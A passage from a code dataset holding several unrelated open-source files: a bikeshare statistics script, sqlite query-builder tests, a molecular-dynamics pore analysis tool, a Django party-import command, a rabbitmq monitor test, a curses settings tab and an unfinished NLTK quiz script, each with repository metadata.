        outlog['inserts_processed'].append(inserts_processed_string)
    # once inserts are processed - check whether all dependencies were used
    dependencies = ls.pcom_post_process_dependencies(dependencies,filename,valid_inserts)
    # if settings.txt was pulled in by default commands then record it too
    if ct.PCOM_REQ_FILE_SETTINGS in site_settings['add_settings_to_dependencies']:
        key_ref = ct.PCOM_REQ_FILE_SETTINGS
        dependencies = ls.pcom_update_dependencies(dependencies,filename,key_ref)
    return html_array,outlog,site_settings,dependencies
| MickyHCorbett/MorfLess | libraries/read_schematic.py | read_schematic.py | py | 22,611 | python | en | code | 0 | github-code | 50 |
32156594739 | import time
import datetime
import pandas as pd
import numpy as np
# Mapping of supported city names to their bikeshare data CSV files
# (paths are relative to the working directory).
CITY_DATA = { 'chicago': 'chicago.csv',
              'new york city': 'new_york_city.csv',
              'washington': 'washington.csv' }
def get_filters():
    """
    Asks user to specify a city, month, and day to analyze.

    Returns:
        (str) city - name of the city to analyze
        (str) month - name of the month to filter by, or "all" to apply no month filter
        (str) day - name of the day of week to filter by, or "all" to apply no day filter
    """
    print('Hello! Let\'s explore some US bikeshare data!')

    # get user input for city (chicago, new york city, washington)
    city = _prompt_choice(
        "Please enter a city (from chicago, new york city, washington): ",
        {'chicago', 'new york city', 'washington'},
        "I'm sorry i didn't recognise that city!")

    # get user input for month (all, january, february, ... , june)
    # BUGFIX: the retry prompt previously asked for a "city" and omitted
    # the accepted 'all' option.
    month = _prompt_choice(
        "Please enter a month (from all, january, february, march, april, may, june): ",
        {'all', 'january', 'february', 'march', 'april', 'may', 'june'},
        "I'm sorry i didn't recognise that month!")

    # get user input for day of week (all, monday, tuesday, ... sunday)
    day = _prompt_choice(
        "Please enter a day (from all, monday, tuesday, wednesday, thursday, friday, saturday, sunday): ",
        {'all', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday'},
        "I'm sorry i didn't recognise that day!")

    print('-'*40)
    return city, month, day


def _prompt_choice(prompt, valid, error_message):
    """Prompt repeatedly (case-insensitively) until the answer is in `valid`."""
    answer = input(prompt).lower()
    while answer not in valid:
        print(error_message)
        answer = input(prompt).lower()
    return answer
def load_data(city, month, day):
    """
    Loads data for the specified city and filters by month and day if applicable.

    Args:
        (str) city - name of the city to analyze
        (str) month - name of the month to filter by, or "all" to apply no month filter
        (str) day - name of the day of week to filter by, or "all" to apply no day filter
    Returns:
        df - Pandas DataFrame containing city data filtered by month and day
    """
    # load data file into a dataframe
    df = pd.read_csv(CITY_DATA[city])

    # convert the Start Time column to datetime
    df['Start Time'] = pd.to_datetime(df['Start Time'])

    # extract hour, month and weekday name from Start Time into new columns.
    # BUGFIX: Series.dt.weekday_name was removed in pandas 1.0; day_name()
    # is the supported replacement and returns the same capitalized names.
    df['hour'] = df['Start Time'].dt.hour
    df['month'] = df['Start Time'].dt.month
    df['day_of_week'] = df['Start Time'].dt.day_name()

    # filter by month if applicable
    if month != 'all':
        # use the index of the months list to get the corresponding int
        months = ['january', 'february', 'march', 'april', 'may', 'june']
        month = months.index(month) + 1
        df = df[df['month'] == month]

    # filter by day of week if applicable
    if day != 'all':
        df = df[df['day_of_week'] == day.title()]

    return df
def time_stats(df):
    """Print the most frequent month, weekday and start hour of travel.

    Expects a DataFrame with 'month' (1-12 int), 'day_of_week' (name) and
    'hour' columns, as produced by load_data.
    """
    print('\nCalculating The Most Frequent Times of Travel for bikes are...\n')
    start_time = time.time()

    # month: convert the modal month number into its English name
    top_month = int(df['month'].mode()[0])
    month_name = datetime.date(1900, top_month, 1).strftime('%B')
    print('The most common month for travel is: ' + month_name + '\n')

    # weekday name
    top_day = df['day_of_week'].mode()[0]
    print('The most common week day for travel is: ' + str(top_day) + '\n')

    # starting hour
    top_hour = df['hour'].mode()[0]
    print('The most common hour for starting travel is: ' + str(top_hour) + ':00 Hrs\n')

    print("\nThis took %s seconds." % (time.time() - start_time))
    print('-'*40)
def station_stats(df):
    """Displays statistics on the most popular stations and trip.

    BUGFIX: the original added a 'Start & End Station' column to the
    caller's DataFrame as a hidden side effect; the combination is now
    computed on a throwaway Series so df is left untouched.
    """
    print('\nCalculating The Most Popular Stations and Trip...\n')
    start_time = time.time()

    # display most commonly used start station
    most_common_ss = df['Start Station'].mode()[0]
    print('The most common start station is: ' + most_common_ss + '\n')

    # display most commonly used end station
    most_common_es = df['End Station'].mode()[0]
    print('The most common end station is: ' + most_common_es + '\n')

    # most frequent start/end combination, computed without mutating df
    combos = df['Start Station'] + ' -> ' + df['End Station']
    most_common_ss_es = combos.mode()[0]
    print('The most common start and end station combination is: ' + most_common_ss_es + '\n')

    print("\nThis took %s seconds." % (time.time() - start_time))
    print('-'*40)
def trip_duration_stats(df):
    """Print total and mean trip duration from the 'Trip Duration' column.

    Durations are stored in seconds; the total is also shown in years and
    the mean also in minutes. Returns None.
    """
    print('\nCalculating Trip Duration...\n')
    t0 = time.time()
    # Total, in seconds and (rounded) years.
    total_seconds = df['Trip Duration'].sum()
    total_years = round(total_seconds / 60 / 60 / 24 / 365, 2)
    print(f'The total travel time is: {total_seconds} seconds or {total_years} years\n')
    # Mean, in seconds and (rounded) minutes.
    mean_seconds = round(df['Trip Duration'].mean(), 2)
    mean_minutes = round(mean_seconds / 60, 2)
    print(f'The mean travel time is: {mean_seconds} seconds or {mean_minutes} minutes\n')
    print(f'\nThis took {time.time() - t0} seconds.')
    print('-' * 40)
def user_stats(df, city):
    """Print user-type counts, plus gender and birth-year stats.

    Washington's dataset lacks 'Gender' and 'Birth Year' columns, so those
    stats are skipped for city == 'washington'. Returns None.
    """
    print('\nCalculating User Stats...\n')
    t0 = time.time()
    # Counts per user type (Subscriber / Customer / ...).
    print('The number of users of each type are the following: \n')
    print(df['User Type'].value_counts())
    if city != 'washington':
        print('\n')
        # Counts per gender.
        print('The number of users of each gender are the following: \n')
        print(df['Gender'].value_counts())
        # Earliest, latest and modal birth years, shown as plain ints.
        print(f"\nThe earliest year of birth is: {int(df['Birth Year'].min())}\n")
        print(f"The most recent year of birth is: {int(df['Birth Year'].max())}\n")
        print(f"The most common year of birth is: {int(df['Birth Year'].mode()[0])}\n")
    else:
        print('Gender & birth stats are not available for Washington \n')
    print(f'\nThis took {time.time() - t0} seconds.')
    print('-' * 40)
def main():
    """Interactive driver: filter, show all statistics, page raw rows,
    and offer to restart until the user declines."""
    while True:
        city, month, day = get_filters()
        df = load_data(city, month, day)
        time_stats(df)
        station_stats(df)
        trip_duration_stats(df)
        user_stats(df, city)
        # Page through the raw rows five at a time on request.
        row = 0
        choice = input('\nWould you like to view the first 5 rows of data ? Enter yes or no.\n').lower()
        while choice != 'no':
            print(df[row:row + 5])
            row += 5
            choice = input('\nWould you like to view the next 5 rows of data ? Enter yes or no.\n').lower()
        if input('\nWould you like to restart? Enter yes or no.\n').lower() != 'yes':
            break


if __name__ == "__main__":
    main()
| pranath/bikeshare_analysis | bikeshare.py | bikeshare.py | py | 8,092 | python | en | code | 0 | github-code | 50 |
33125097077 |
import pytest
from . import moduleInstalled
pytestmark = pytest.mark.skipif(not moduleInstalled('sqlite3'), reason = 'sqlite3 is not installed.')
import sqlite3
from medoo.base import Base
from medoo.builder import Builder, Field
from medoo.dialect import Dialect
from medoo.database.sqlite import Sqlite, DialectSqlite
@pytest.fixture
def db():
    """Yield an in-memory Sqlite handle with table `t` pre-populated."""
    handle = Sqlite(database_file = 'file://:memory:', dialect = DialectSqlite)
    handle.query('CREATE TABLE t (id int auto increment, cont text, icont INTEGER);')
    # Ten fixed rows; row 6 deliberately has a NULL cont.
    rows = [
        (1, 'a', 0),
        (2, 'b', 1),
        (3, 'c', 2),
        (4, 'd', 9),
        (5, 'e', 3),
        (6, None, 3),
        (7, 'g', 4),
        (8, 'h', 5),
        (9, 'i', 3),
        (10, 'j', 1)
    ]
    handle.insert('t', ['id', 'cont', 'icont'], *rows)
    yield handle
class TestSqlite(object):
    """Unit tests for the Sqlite wrapper (uses the `db` fixture above)."""

    @pytest.mark.parametrize('args, kwargs, outs', [
        ([], {'database': ':memory:', 'dialect': None}, None)
    ])
    def test0Init(self, args, kwargs, outs):
        """A fresh connection has empty history/errors and the sqlite dialect."""
        outs = outs or {}
        db = Sqlite(*args, **kwargs)
        assert db.logging == outs.get('logging', False)
        assert bool(db.connection) is outs.get('connection', True)
        assert bool(db.cursor) is outs.get('cursor', True)
        assert db.history == outs.get('history', [])
        assert db.errors == outs.get('errors', [])
        assert db.sql == outs.get('sql')
        # Builder.DIALECT is class-level (global) state.
        assert Builder.DIALECT is outs.get('dialect', DialectSqlite)
        assert isinstance(db.builder, Builder)
        assert db.last() == ''
        assert db.log() == []

    def test1Dialect(self):
        """dialect() with no argument resets to the base Dialect."""
        db = Sqlite(database = ':memory:', dialect = DialectSqlite)
        assert Builder.DIALECT is DialectSqlite
        db.dialect()
        assert Builder.DIALECT is Dialect
        db.dialect(DialectSqlite)
        assert Builder.DIALECT is DialectSqlite

    def test2Insert(self, db):
        """Insert via dict and via column-list + tuples; selects are lazy."""
        r = db.insert('t', {'id': 1, 'cont': 'k'})
        assert r
        rs = db.select('t', where = {'id': 1})
        assert len(rs.all()) == 2
        r = db.insert('t', ['id', 'cont'], (1, 'l'), (1, 'm'))
        rs = db.select('t', where = {'id': 1})
        # Result set is lazy: len() is 0 until .all() materializes the rows.
        assert len(rs) == 0
        assert len(rs.all()) == 4
        rs = db.select('t', 'id', distinct = True)
        assert len(rs.all()) == 10

    def test3Update(self, db):
        """Updates work for plain values, None (issue #4) and bools (issue #4)."""
        r = db.update('t', {'cont': 'A'}, {'id':1})
        assert r
        rs = db.select('t', where = {'id':1})
        assert rs[0].cont == 'A'
        # update 7 to None, issue #4
        r = db.update('t', {'cont': None}, {'id':7})
        assert db.get('t', 'cont', where = {'id': 7}) is None
        # update 8 to True, issue #4 (stored as integer 1)
        r = db.update('t', {'icont': True}, {'id':8})
        assert db.get('t', 'icont', where = {'id':8}) == 1

    def test4Delete(self, db):
        """Deleting by id removes the row."""
        r = db.delete('t', {'id':1})
        assert r
        rs = db.select('t', where = {'id':1})
        assert len(rs.all()) == 0

    def test5HasGet(self, db):
        """has() reports existence; get() returns a single field value."""
        r = db.has('t', where = {'id': 1})
        assert r
        r = db.has('t', where = {'id': 20})
        assert not r
        r = db.get('t', 'cont', where = {'id': 1})
        assert r == 'a'

    def testSubquery(self, db):
        """Subqueries work both in WHERE clauses and as derived tables."""
        rs = db.select('t', where = {
            'id': db.builder.select('t', 'id', where = {'id[<]':5})
        })
        # Self-join against a named subquery; aliases id1/id2 per table.
        rs = db.select([
            't(t1)',
            db.builder.select('t', 'id', sub = 't2')
        ], 't1.id(id1),t2.id(id2)', where = {'id1[<]': 3, 'id1': Field('id2')})
        assert len(rs.all()) == 2
        assert rs[0] == {'id1': 1, 'id2': 1}
        assert rs[1] == {'id1': 2, 'id2': 2}
| pwwang/pymedoo | tests/test_sqlite.py | test_sqlite.py | py | 3,203 | python | en | code | 15 | github-code | 50 |
10410201734 | import mdtraj
import numpy
import scipy
from scipy.spatial.transform import Rotation
import math
import sys
import csv
from shapely.geometry import Polygon, LinearRing, Point, LineString
from shapely.ops import polylabel
from shapely.validation import make_valid
import shapely
from PIL import Image, ImageDraw
import argparse
import os
# given a plane expressed by a point and a normal vector, returns array of
# vertices projected onto the plane
# from https://stackoverflow.com/questions/35656166/projecting-points-onto-a-plane-given-by-a-normal-and-a-point
def planeprojection(normalvector, centroid, vertices):
    """Project vertices onto the plane through `centroid` with normal `normalvector`.

    Accepts either a single vertex (1-D length-3 array) or an (n, 3) array
    of vertices, and returns the projection(s) with the same rank.
    `normalvector` is assumed to be unit length (same assumption as the
    original implementation).
    """
    n = numpy.asarray(normalvector, dtype=float)
    v = numpy.asarray(vertices, dtype=float)
    # Signed distance of each vertex from the plane, along the normal.
    dist = numpy.dot(v - centroid, n)
    if v.ndim == 1:
        # Single vertex: subtract its out-of-plane component.
        return v - dist * n
    # Vectorized replacement for the original per-vertex Python loop:
    # outer(dist, n) is the (n, 3) matrix of out-of-plane components.
    return v - numpy.outer(dist, n)
def draw_scaled(geom, output, fnumber, i=0):
    """Render a shapely geometry scaled into a 500x500 canvas and save it.

    The image is written as '<output>_poreseg_f<fnumber>_<i>.png' and moved
    into '<output>_poreseg_out' (the directory is expected to exist).
    Raises ValueError for geometry types without drawable coordinates.
    """
    size = 500
    margin = 50
    black = (0, 0, 0)
    white = (255, 255, 255)
    img = Image.new('RGB', (size, size), white)
    draw = ImageDraw.Draw(img)
    # Scale the geometry to fill the canvas minus margins, then translate it
    # into PIL's top-left-origin coordinate system.
    xscale = (size - margin * 2) / (geom.bounds[2] - geom.bounds[0])
    yscale = (size - margin * 2) / (geom.bounds[3] - geom.bounds[1])
    lr_scaled = shapely.affinity.scale(geom, xfact=xscale, yfact=yscale, origin='center')
    xshift = margin - (lr_scaled.bounds[0])
    yshift = margin - (lr_scaled.bounds[1])
    lr_translated = shapely.affinity.translate(lr_scaled, xoff=xshift, yoff=yshift)
    # NOTE(review): MultiPolygon has no .coords attribute, so that branch
    # would raise AttributeError -- preserved from the original; confirm
    # whether MultiPolygon inputs actually occur.
    if lr_translated.geom_type in ['LinearRing', 'MultiPolygon', 'LineString']:
        coords = list(lr_translated.coords)
    elif lr_translated.geom_type == 'Polygon':
        coords = list(lr_translated.exterior.coords)
    else:
        print(lr_translated.geom_type)
        raise ValueError('{} is not a valid shapely geometry to draw'.format(lr_translated.geom_type))
    newpoints = [(int(px), int(py)) for px, py in coords]
    draw.line(newpoints, width=5, fill=black)
    name = '{}_poreseg_f{}_{}.png'.format(output, fnumber, i)
    img.save(name)
    # BUGFIX: the original used the global `args.output` here instead of the
    # `output` parameter, which breaks any call where the two differ (and any
    # import of this module without the __main__ argparse having run).
    data_dir = '{}_poreseg_out'.format(output)
    os.rename(name, os.path.join(data_dir, name))
    return
def pore_numbers_3mt6(trajfile, topfile, chainlist, fskip, output, residue, sidechain):
    """Analyze pore geometry over a trajectory.

    For each frame: fit a plane to the selected sidechain atoms, project the
    pore-lining atoms onto it, and compute pore area / width / tilt angle plus
    per-chain theta and azimuthal angles. Every `fskip` frames a pore image is
    rendered.

    Returns (angledata, poredata, imgs) where angledata[chain][frame] is
    [theta, azimuth], poredata[frame] is [area, width, angle_deg], and imgs is
    a list of PIL images.
    """
    # for each frame calculate the pore width and other variables
    # assumes that indices denotes the ARG residues that are members of the pores
    # angledata shape is (chainID, frames, 2) (theta angle, azimuthal angle)
    # poredata shape is (frame, 3) (pore area, pore width, pore angle)
    top = mdtraj.load(topfile).topology
    traj = mdtraj.load_xtc(trajfile, top)
    angledata = []
    for i in range(0, len(chainlist)):
        angledata.append([])
    poredata = []
    # Atom selections: one CA and one sidechain atom per chain for `residue`.
    chains = ' '.join([str(x) for x in chainlist])
    CAs = top.select('name CA and residue {} and chainid '.format(residue) + chains)
    CZs = top.select('name {} and residue {} and chainid '.format(sidechain, residue) + chains)
    imgs = []
    for fnumber, frame in enumerate(traj):
        poredata.append([0, 0, 0])
        CAr = frame.xyz[0][CAs]
        CZr = frame.xyz[0][CZs]
        #print(CAr)
        # find best fitting center between all the alpha carbons of ARG15s, which denotes the pore center
        # (is placed inside array, which is why [0])
        porecenter = numpy.mean(CZr, axis=0, keepdims=True)[0]
        # find the singular value decomposition of the CZr with the centroid removed
        u, s, vh = numpy.linalg.svd(CZr - porecenter, full_matrices=True)
        # extract the best fitting right singular vector which is the normal of the plane
        # this is the last column of v and is guaranteed to be orthogonal to all other dimensional vectors of CZr and v
        # need to transpose vh first to get v
        # then get the rightmost column ([:,-1] means every row, last column in matrix read from left to right)
        zprime = numpy.transpose(vh)[:, -1]
        # find the centroid of the protein
        # (is placed inside array, which is why [0])
        center = numpy.mean(frame.xyz[0], axis=0, keepdims=True)[0]
        # if the porecenter+zprime is closer to the protein center than porecenter, zprime needs to be flipped to point
        # away from the decomposition chamber (out of the protein)
        # ord=2 denotes Euclidian norm, or length of the vector
        if numpy.linalg.norm((porecenter+zprime)-center, ord=2) < numpy.linalg.norm(porecenter-center, ord=2):
            zprime = zprime*-1
        #print(zprime)
        # find the projections of all CAr and CZr onto the plane of the pore along the zprime axis
        CAr_projected = planeprojection(zprime, porecenter, CAr)
        #print(CZr)
        CZr_projected = planeprojection(zprime, porecenter, CZr)
        #print(CZr_projected)
        # these points are not necessarily aligned with the xyz axes
        # (although many times they are approximately aligned with the x axis meaning the x axis can pass through the center of the pore,
        # due to alignment of the entire protein during simulation setup)
        # so rotate them in such a way that the zprime axes is pointing directly out of the screen
        # which corresponds to looking at the pore from the outside of the protein
        zprimemag = numpy.linalg.norm(zprime, ord=2)
        # 0, 0, 1 is pointing out of the screen in VMD
        angle = math.acos(numpy.dot(zprime, [0, 0, 1])/(zprimemag))
        #print(math.degrees(angle))
        # even though we have the angle we need an axis to rotate about
        # the cross product of the zprime and z axes can give us this axis because it is perpendicular to both
        rotaxis = numpy.cross(zprime, [0, 0, 1])
        # CZr are row vectors so initialize the rotation matrix with a row vector
        r = Rotation.from_rotvec(angle*rotaxis)
        # CZr are row vectors
        # apply() rotates each vector by the rotation matrix in turn
        # and returns a matrix of row vectors
        CZr_projected_aligned = r.apply(CZr_projected)
        #p = Polygon(CZr_projected_aligned)
        # make_valid repairs self-intersecting pore outlines.
        pore = make_valid(Polygon(CZr_projected_aligned))
        # p may be a multipolygon or some other object
        # so find the one with the largest area
        # and print the other areas
        if pore.geom_type == 'MultiPolygon':
            draw_scaled(Polygon(CZr_projected_aligned), output, fnumber)
            largest = 0
            p = None
            print()
            print('frame {} complex pore shape, taking largest area'.format(fnumber))
            for i, poreseg in enumerate(pore.geoms):
                print(poreseg.area)
                if poreseg.area > largest:
                    p = poreseg
                    largest = poreseg.area
                poreseg = LineString(poreseg.exterior.coords)
                draw_scaled(poreseg, output, fnumber, i+1)
            print('largest area: >>>{}<<<'.format(largest))
        else:
            print()
            print('frame {} recording full pore'.format(fnumber))
            p = pore
            print(p.area)
            print(p.geom_type)
        lr = LinearRing(p.exterior.coords)
        # find the largest inscribed circle of this coplanar set of points
        # the diameter of this circle is the pore width
        #Point of inaccessibility is the center of the largest inscribed circle
        poa = polylabel(p, tolerance=0.000001)
        #find closest distance to any point on the heptagon which is the radius of the largest inscribed circle
        pore_width = poa.distance(lr)*2
        #print("LIC: {}\nArea: {}\nDiameter: {}".format(poa, p.area, pore_width))
        poredata[-1][0] = p.area
        poredata[-1][1] = pore_width
        poredata[-1][2] = math.degrees(angle)
        # find all the theta angles
        for chainindex, alphaC in enumerate(CAr):
            r = alphaC - CZr[chainindex]
            # theta is dot product between vector from CA to CZ and zprime
            zprimemag = numpy.linalg.norm(zprime, ord=2)
            rmag = numpy.linalg.norm(r, ord=2)
            theta = math.degrees(math.acos(numpy.dot(zprime, r)/(zprimemag*rmag)))
            angledata[chainindex].append([theta, 0])
        # find azimuthal angles
        # use CAr_projected because we want yprime to be orthogonal to zprime
        for chainindex, alphaC in enumerate(CAr_projected):
            yprime = alphaC-porecenter
            # original paper had the xprime axes being yprime cross zprime
            xprime = numpy.cross(yprime, zprime)
            r = CZr_projected[chainindex]-alphaC
            xprimemag = numpy.linalg.norm(xprime, ord=2)
            rmag = numpy.linalg.norm(r, ord=2)
            azimuth = math.degrees(math.acos(numpy.dot(xprime, r)/(xprimemag*rmag)))
            #add azimuth to newest frame
            angledata[chainindex][-1][-1] = azimuth
        size = 500
        margin = 50
        # Render every fskip-th frame's pore outline plus its largest
        # inscribed circle (red).
        if fnumber%fskip == 0:
            black = (0, 0, 0)
            white = (255, 255, 255)
            img = Image.new('RGB', (size, size), white)
            im_px_access = img.load()
            draw = ImageDraw.Draw(img)
            # need to scale pore to the proper size for the image
            # to do this we need to multiply the points by a transformation matrix that scales
            # and then translates them to match the coordinate system of PIL
            #bounds is minx, miny, maxx, maxy
            xscale = (size-margin*2)/(lr.bounds[2]-lr.bounds[0])
            yscale = (size-margin*2)/(lr.bounds[3]-lr.bounds[1])
            lr_scaled = shapely.affinity.scale(lr, xfact=xscale, yfact=yscale, origin='center')
            xshift = margin-(lr_scaled.bounds[0])
            yshift = margin-(lr_scaled.bounds[1])
            lr_translated = shapely.affinity.translate(lr_scaled, xoff=xshift, yoff=yshift)
            #print(CZr)
            #print(CZr_projected)
            #print(CZr_projected_aligned)
            #print(zprime)
            #print(math.degrees(angle))
            newpoints = []
            for point in list(lr_translated.coords):
                newpoints.append((int(point[0]), int(point[1])))
            #print(newpoints)
            draw.line(newpoints, width=5, fill=black)
            #origin = (lr_translated.bounds[0], lr_translated.bounds[1])
            #poa_scaled = shapely.affinity.scale(poa, xfact=xscale, yfact=yscale, origin='center')
            #poa_translated = shapely.affinity.translate(poa_scaled, xoff=xshift, yoff=yshift)
            poa_translated = polylabel(Polygon(lr_translated), tolerance=1)
            x, y = poa_translated.coords[0]
            draw.point((x, y), black)
            d = poa_translated.distance(lr_translated)
            rect = (x-d, y-d, x+d, y+d)
            draw.arc(rect, 0, 359, fill=(255, 0, 0), width=2)
            imgs.append(img)
    return angledata, poredata, imgs
if __name__ == "__main__":
    # Command-line entry point: parse arguments, create the output
    # directories, run the analysis, then write images and CSV summaries.
    parser = argparse.ArgumentParser(description="Calculate key data of 3mt6/1yg6 pores")
    parser.add_argument('-f', '--trajectory', type=str, help='The trajectory file to analyze', required=True)
    parser.add_argument('-s', '--topology', type=str, help='The topology file to use', required=True)
    parser.add_argument('-c', '--chains', type=int, help='The chain indexes to pick from', nargs='+', required=True)
    parser.add_argument('-o', '--output', type=str, help='The prefix of the output files', default='3mt6')
    parser.add_argument('-fs', '--frameskip', type=int, help='Every frameskip frames, output a picture of the pore', \
        default=10)
    parser.add_argument('-r', '--residue', type=int, help='The residue number to pick', required=True)
    parser.add_argument('-an', '--atomn', type=str, help='The sidechain atom name on the specific residue to pick', \
        default='CZ')
    args = parser.parse_args()
    data_dir = '{}_out'.format(args.output)
    # Create both output directories up front; draw_scaled() expects
    # '<output>_poreseg_out' to already exist.
    try:
        os.mkdir(data_dir)
    except FileExistsError:
        pass
    try:
        os.mkdir('{}_poreseg_out'.format(args.output))
    except FileExistsError:
        pass
    angledata, poredata, imgs = pore_numbers_3mt6(args.trajectory, args.topology, args.chains, args.frameskip, args.output, args.residue, args.atomn)
    # Save the rendered pore images; filenames carry the real frame number.
    for i, img in enumerate(imgs):
        name = '{}_frame_{}.png'.format(args.output, i*args.frameskip)
        img.save(name)
        os.rename(name, os.path.join(data_dir, name))
    # Write angle data for each chain
    with open('{}_angles.csv'.format(args.output), 'w') as f:
        write = csv.writer(f)
        for index, chain in enumerate(angledata):
            write.writerow(['Chain ID {}'.format(args.chains[index])])
            write.writerow(['Frame', 'Theta', 'Azimuth'])
            for frameindex, frame in enumerate(chain):
                write.writerow([frameindex, *tuple(frame)])
    os.rename('{}_angles.csv'.format(args.output), os.path.join(data_dir, '{}_angles.csv'.format(args.output)))
    # Write pore width and diameter
    with open('{}_pore.csv'.format(args.output), 'w') as f:
        write = csv.writer(f)
        write.writerow(['Frame', 'Pore Area', 'Pore Width', 'Pore Angle'])
        for frameindex, frame in enumerate(poredata):
            write.writerow([frameindex, *tuple(frame)])
    os.rename('{}_pore.csv'.format(args.output), os.path.join(data_dir, '{}_pore.csv'.format(args.output)))
    sys.exit()
#
| ts-hayden-dennison/pore_info | pore_info.py | pore_info.py | py | 13,353 | python | en | code | 0 | github-code | 50 |
70695901917 | import requests
from django.core.management.base import BaseCommand
from uk_political_parties.models import Party, PartyEmblem
class Command(BaseCommand):
    """Import political parties and their emblems from the candidates API."""

    def clean_party(self, party_id, party):
        """Map one API organisation payload onto Party model fields."""
        return {
            "party_id": party_id,
            "party_name": party["name"],
            "registered_date": party["date_registered"],
            "register": party["register"],
        }

    def handle(self, **options):
        base_url = "https://candidates.democracyclub.org.uk"
        next_url = "{}/api/next/parties/".format(base_url)
        # Follow the paginated API until there is no `next` link.
        while next_url:
            payload = requests.get(next_url).json()
            for org in payload["results"]:
                ec_id = org["ec_id"]
                print(ec_id, org["name"])
                # Upsert the party itself...
                (party_obj, created) = Party.objects.update_or_create(
                    party_id=ec_id, defaults=self.clean_party(ec_id, org)
                )
                # ...and each of its emblems (skipped when the list is empty).
                for emblem in org["emblems"] or []:
                    PartyEmblem.objects.update_or_create(
                        party_id=ec_id, emblem_url=emblem["image"],
                    )
            next_url = payload.get("next", None)
| DemocracyClub/electionleaflets | electionleaflets/apps/core/management/commands/import_parties.py | import_parties.py | py | 1,313 | python | en | code | 8 | github-code | 50 |
29991018390 | from functools import partial as p
import os
import string
from tests.helpers import fake_backend
from tests.helpers.util import wait_for, run_agent, run_container, container_ip
from tests.helpers.assertions import *
rabbitmq_config = string.Template("""
monitors:
- type: collectd/rabbitmq
host: $host
port: 15672
username: guest
password: guest
collectNodes: true
collectChannels: true
""")
def test_rabbitmq():
    """Integration test: the rabbitmq monitor emits datapoints tagged with
    the default plugin_instance '<host>-<port>'."""
    with run_container("rabbitmq:3.6-management") as rabbitmq_cont:
        host = container_ip(rabbitmq_cont)
        config = rabbitmq_config.substitute(host=host)
        # Wait for the management API port before starting the agent.
        assert wait_for(p(tcp_socket_open, host, 15672), 60), "service didn't start"
        with run_agent(config) as [backend, _, _]:
            assert wait_for(p(has_datapoint_with_dim, backend, "plugin", "rabbitmq")), "Didn't get rabbitmq datapoints"
            assert wait_for(p(has_datapoint_with_dim, backend, "plugin_instance", "%s-15672" % host)), \
                "Didn't get expected plugin_instance dimension"
def test_rabbitmq_broker_name():
    """Integration test: the brokerName template option is rendered into the
    plugin_instance dimension ('<host>-<username>')."""
    with run_container("rabbitmq:3.6-management") as rabbitmq_cont:
        host = container_ip(rabbitmq_cont)
        # (The original also built `config = rabbitmq_config.substitute(...)`
        # here but never used it; the inline config below is what runs.)
        assert wait_for(p(tcp_socket_open, host, 15672), 60), "service didn't start"
        with run_agent("""
monitors:
  - type: collectd/rabbitmq
    host: %s
    brokerName: '{{.host}}-{{.username}}'
    port: 15672
    username: guest
    password: guest
    collectNodes: true
    collectChannels: true
""" % (host,)) as [backend, _, _]:
            assert wait_for(p(has_datapoint_with_dim, backend, "plugin_instance", "%s-guest" % host)), \
                "Didn't get expected plugin_instance dimension"
| someword/signalfx-agent | tests/monitors/rabbitmq_test.py | rabbitmq_test.py | py | 1,758 | python | en | code | null | github-code | 50 |
3847494735 | # -*- coding: utf-8 -*-
"""
settings tab
"""
import curses
from curse.tab_gen import TabEntry
from curse.menu_gen import MenuEntry
from curse.list_gen import List
class TabSettings(TabEntry):
    """Settings tab: shows config keys and values, lets the user edit a value
    in place and save the whole configuration back to disk."""

    def __init__(self, parent):
        """Initialise the tab and keep a handle on the owning application."""
        TabEntry.__init__(self, 'Settings')
        self.parent = parent
        self.listkeys = None

    def display(self):
        """Display the tab: keys in a static list, values in the active one."""
        self.changeMenu()
        # BUGFIX: materialize the keys. dict.keys() returns a view object on
        # Python 3, which is not indexable -- savesetting() indexes it with
        # self.listkeys[i], which raised TypeError before this fix.
        self.listkeys = list(self.parent.options.conf.keys())
        listvalues = []
        for key in self.listkeys:
            listvalues.append(self.parent.options.conf[key])
        visible2 = List(self.screen, self.listkeys, False)
        visible2.display(10, 4, 15)
        self.visible = List(self.screen, listvalues, True)
        self.visible.display(28, 4, 15)

    def changeMenu(self):
        """Replace the action-menu entries with this tab's actions."""
        self.parent.action_menu.removeAllEntries()
        self.parent.action_menu.addSubEntry(MenuEntry('Change value', 7, \
                action=self.changevalue))
        self.parent.action_menu.addSubEntry(MenuEntry('Save', \
                action=self.savesetting))
        self.parent.action_menu.addSubEntry(MenuEntry('Close', \
                action=self.parent.tabs.closeActiveTab))

    def changevalue(self):
        """Let the user type a new value for the highlighted setting."""
        pos = self.visible.posend
        width = self.screen.getmaxyx()[1]-32
        self.screen.addstr(pos[0], pos[1], ' '*width)
        # Temporarily switch curses to echoing line input.
        curses.curs_set(1)
        curses.nocbreak()
        curses.echo()
        self.screen.move(pos[0], pos[1])
        name = self.screen.getstr()
        curses.noecho()
        curses.curs_set(0)
        curses.cbreak()
        # NOTE(review): getstr() returns bytes on Python 3, so this comparison
        # and the stored value may need a .decode() -- confirm target runtime.
        if name != '':
            self.visible.list_elt[self.visible.active] = name
            self.visible.update()

    def savesetting(self):
        """Write the edited values back to the options object and persist."""
        opt = {}
        for i in range(len(self.listkeys)):
            opt[self.listkeys[i]] = self.visible.list_elt[i]
        self.parent.options.conf.update(opt)
        self.parent.options.saveConf()
| sensini42/flvdown | curse/tab_settings.py | tab_settings.py | py | 2,117 | python | en | code | 3 | github-code | 50 |
20058427342 | import nltk as mahedi
# Fill-in-the-blank quiz: pick a topic file, blank out the first run of
# proper nouns (or of numbers, when the sentence contains any) in each
# sentence, and score the user's answers.
print("1. Bangladesh\n2. Taj Mahal\n3. Unreal Engine\n4. BCB\n5. kuet")
a = int(input("Choose an option: "))

# Menu option -> quiz source file (replaces the original if/elif chain).
topic_files = {1: "trial.txt", 2: "tajMahal.txt", 3: "unreal.txt", 4: "bdckt.txt", 5: "kuet.txt"}
# `with` closes the file handle (the original leaked it), and `text` no
# longer shadows the builtin `str`.
with open(topic_files[a], "r") as f:
    text = f.read()

score = 0
for sentence in mahedi.sent_tokenize(text):
    pos = mahedi.pos_tag(mahedi.word_tokenize(sentence))
    words = [w for w, _ in pos]
    dummy = [t for _, t in pos]   # original tags, kept for comparison
    tags = list(dummy)            # working copy; blanked tags become 'null'
    # Blank the first run of cardinal numbers if the sentence has any,
    # otherwise the first run of proper nouns.
    target = ("CD",) if "CD" in tags else ("NNP", "NNPS")
    for it in range(len(tags)):
        if tags[it] in target:
            tags[it] = "null"
            itt = it + 1
            # BUGFIX: the original CD branch tested tags[it] (which it had
            # just set to 'null') instead of tags[itt], so runs of
